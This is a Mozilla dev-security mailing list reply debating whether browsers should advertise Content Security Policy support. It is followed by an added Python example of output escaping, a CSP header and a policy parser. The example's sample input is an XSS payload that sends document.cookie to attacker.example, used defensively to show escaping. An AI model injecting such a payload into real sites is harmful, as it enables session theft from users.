On Dec 19, 12:30 pm, Gervase Markham <g...@mozilla.org> wrote:
> > Maybe it's not completely bad for browsers to advertise whether or not
> > they support CSP (and which versions). There's a benefit for web
> > developers who can decide to serve more restricted/filtered content to
> > browsers that won't "catch them when they fall".
> If there's additional filtering they know how to do, they should be
> doing it for everyone.

I'm not sure I agree with that... take for instance a browser that only supports SSL v2 (and not 3): a site concerned with avoiding MITM attacks might serve different content (or none) to someone whose browser only supports SSL v2, and serve all the site's content to someone whose browser supports v3. That doesn't warrant blocking content to all visitors regardless of what security constructs their browser supports. If the filtering in question just removes possibly-evil data, then yeah, it should be done for everyone. However, the filtering in question might remove site functionality because the client's browser may not play nice.

> > consider a webmaster who is just learning some new technology
> > X may not be comfortable enough to serve X content without a safety
> > net that CSP provides, but is being pressured to add features to his
> > site.
> Then he shouldn't use X. (Who designed X to be unsafe by default? Go
> shoot them. :-)

I see your point. One would hope X is not *designed* to be unsafe, but it might not be rock-solid, with a history of security issues (like Flash). The webmaster might not feel completely comfortable with his mastery of it, so only feels comfortable providing Flash-based content to people whose browsers will help protect them. I block Flash content from most sites (and don't employ it on my own web sites), but may change my ways if CSP were available to help out with more CSRF protection.

-Sid

_______________________________________________
dev-security mailing list
dev-security@lists.mozilla.org
https://lists.mozilla.org/listinfo/dev-security
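The two layers the thread is arguing about, as an added example that is not part of the original message or of Mozilla's CSP work: server-side filtering that every visitor receives regardless of browser, plus a CSP header sent with every response so that browsers which implement it get the safety net, and a small policy parser that answers whether a given policy still permits inline script or plugin content such as Flash. The comment page, the policy string and the sample injected comment are constructed for illustration; the header name and directive syntax are the modern Content-Security-Policy ones, not the X-Content-Security-Policy draft syntax of the era. Nonce and hash sources are deliberately ignored by the inline-script check, so it is a conservative approximation.

```python
from __future__ import annotations

import html

# Constructed policy for the example page: scripts, styles and frames only from
# this origin, no plugin content at all (this is what keeps Flash out), and no
# <base> retargeting.
CSP_POLICY = "default-src 'self'; object-src 'none'; base-uri 'none'"

# Constructed sample of an untrusted comment an attacker might submit.
SAMPLE_COMMENT = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'


def filter_for_everyone(untrusted: str) -> str:
    """Layer 1: escape untrusted text so it can never become markup.

    Runs for every visitor; it does not depend on browser capabilities.
    """
    return html.escape(untrusted, quote=True)


def build_response(untrusted_comment: str) -> tuple[dict[str, str], str]:
    """Layer 2: render the page and attach the policy to every response.

    The server does not know whether the browser enforces CSP; it sends the
    header unconditionally and non-supporting browsers simply ignore it.
    """
    body = (
        "<!doctype html><html><body><p>"
        + filter_for_everyone(untrusted_comment)
        + "</p></body></html>"
    )
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP_POLICY,
    }
    return headers, body


def parse_csp(policy: str) -> dict[str, list[str]]:
    """Split a policy into {directive: [source expressions]}.

    Directives are separated by ';' and tokens by whitespace. If a directive is
    repeated, the first occurrence wins, matching browser behaviour.
    """
    directives: dict[str, list[str]] = {}
    for part in policy.split(";"):
        tokens = part.split()
        if not tokens:
            continue
        name = tokens[0].lower()
        if name not in directives:
            directives[name] = tokens[1:]
    return directives


def effective_sources(directives: dict[str, list[str]], directive: str) -> list[str] | None:
    """Return the source list governing `directive`, falling back to default-src.

    Returns None when neither the directive nor default-src is present, meaning
    the browser's default (unrestricted) behaviour applies.
    """
    if directive in directives:
        return directives[directive]
    return directives.get("default-src")


def allows_inline_script(policy: str) -> bool:
    """True if the policy lets inline <script> run via 'unsafe-inline'.

    Nonce and hash sources are ignored here, so this is a conservative check:
    it reports False for policies that allow only specific inline scripts.
    """
    sources = effective_sources(parse_csp(policy), "script-src")
    if sources is None:
        return True
    return "'unsafe-inline'" in [s.lower() for s in sources]


def allows_plugins(policy: str) -> bool:
    """True unless object-src (or its default-src fallback) is exactly 'none'."""
    sources = effective_sources(parse_csp(policy), "object-src")
    if sources is None:
        return True
    return [s.lower() for s in sources] != ["'none'"]


if __name__ == "__main__":
    headers, body = build_response(SAMPLE_COMMENT)
    print(headers["Content-Security-Policy"])
    print(body)
    print("inline script allowed:", allows_inline_script(CSP_POLICY))
    print("plugins allowed:", allows_plugins(CSP_POLICY))
```

Running the block shows the escaped comment (layer 1 did its job for every browser) and, independently, that the attached policy would block both inline script and plugin content if layer 1 ever failed. The parser is the part a practitioner can reuse: point it at a real policy header to see what the "safety net" actually still permits before relying on it.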